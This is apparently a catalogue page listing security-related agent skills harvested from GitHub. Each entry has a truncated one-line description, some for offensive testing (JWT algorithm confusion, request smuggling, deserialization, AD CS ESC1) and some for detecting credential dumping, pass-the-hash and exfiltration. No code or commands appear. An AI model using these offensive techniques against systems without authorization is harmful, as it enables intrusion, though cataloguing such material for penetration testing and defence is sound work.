GitHub
Skills harvested from GitHub repositories
14810 skills availableexploiting-jwt-algorithm-confusion-attack
Testing APIs that use RS256 (asymmetric) JWT tokens for authentication to check for algorithm downgrade to HS256 Assessi...
exploiting-ipv6-vulnerabilities
Testing whether dual-stack networks have consistent security controls for both IPv4 and IPv6 traffic Demonstrating risks...
exploiting-insecure-deserialization
During authorized penetration tests when applications process serialized data (cookies, API parameters, message queues) ...
exploiting-http-request-smuggling
During authorized penetration tests when the application sits behind a reverse proxy, load balancer, or CDN When testing...
exploiting-broken-function-level-authorization
Testing whether regular users can access administrative API endpoints by direct URL access Assessing APIs for vertical p...
exploiting-api-injection-vulnerabilities
Testing API endpoints that accept user input for database queries, system commands, or external requests Assessing APIs ...
exploiting-active-directory-certificate-services-esc1
ESC1 (Escalation Scenario 1) is a critical misconfiguration in Active Directory Certificate Services where a certificate...
executing-active-directory-attack-simulation
Assessing the security of an Active Directory domain and forest against common and advanced attack techniques Identifyin...
eradicating-malware-from-infected-systems
Malware infection confirmed and containment is in place Forensic investigation has identified all persistence mechanisms...
detecting-t1548-abuse-elevation-control-mechanism
When hunting for privilege escalation via UAC bypass in Windows environments After threat intelligence indicates use of ...
detecting-t1055-process-injection-with-sysmon
When hunting for defense evasion techniques that hide malicious code inside legitimate processes After EDR alerts for su...
detecting-t1003-credential-dumping-with-edr
When hunting for credential theft activity in the environment After compromise indicators suggest attacker has elevated ...
detecting-suspicious-oauth-application-consent
Illicit consent grant attacks trick users into granting excessive permissions to malicious OAuth applications in Azure A...
detecting-spearphishing-with-email-gateway
Spearphishing targets specific individuals using personalized, researched content that bypasses generic spam filters. Em...
detecting-shadow-api-endpoints
Shadow APIs are API endpoints operating within an organization's environment that are not tracked, documented, or secure...
detecting-s3-data-exfiltration-attempts
When GuardDuty detects anomalous S3 access patterns such as bulk downloads from unusual IPs When investigating suspected...
detecting-rootkit-activity
System shows signs of compromise but standard tools (Task Manager, netstat) show nothing abnormal Antivirus/EDR detects ...
detecting-ransomware-precursors-in-network
Building detection rules for pre-ransomware network activity (the average time from Cobalt Strike deployment to encrypti...
detecting-port-scanning-with-fail2ban
Automatically blocking IP addresses that perform port scans against internet-facing servers Defending SSH, HTTP, FTP, an...
detecting-pass-the-hash-attacks
When proactively hunting for indicators of detecting pass the hash attacks in the environment After threat intelligence ...
detecting-ntlm-relay-with-event-correlation
Authorized Testing Disclaimer: The offensive techniques and attack simulations described in this skill are intended excl...
detecting-network-scanning-with-ids-signatures
Network scanning is typically the first phase of an attack, where adversaries enumerate live hosts, open ports, running ...
detecting-network-anomalies-with-zeek
Deploying passive network security monitoring at key network choke points for continuous visibility Generating structure...
detecting-misconfigured-azure-storage
When performing a security audit of Azure Storage accounts across subscriptions When responding to Microsoft Defender fo...